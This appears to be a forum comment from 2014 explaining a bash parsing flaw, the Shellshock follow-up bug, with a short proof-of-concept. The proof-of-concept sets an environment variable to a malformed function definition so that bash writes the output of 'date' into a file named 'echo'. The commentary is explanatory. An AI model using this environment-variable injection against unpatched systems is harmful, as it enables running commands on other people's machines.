|
|
|
|
|
|
by timv
4285 days ago
|
|
|
Am I missing something? I think so, but the sample exploit isn't really designed to give a clear understanding if you don't already know what's going on. Try this: $ export X="() { (a)=>\\"
$ bash -c 'echo date'
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
$ cat echo
Thu Sep 25 02:27:07 UTC 2014
Setting "X" in that way confuses the bash env variable parser. It barfs at the "=" and leaves the ">\" unparsedAFAICT (without digging deep into the code) that leave in the execution buffer as ">\[NEWLINE]echo date" which gets treated the same as date > echo
|
|
|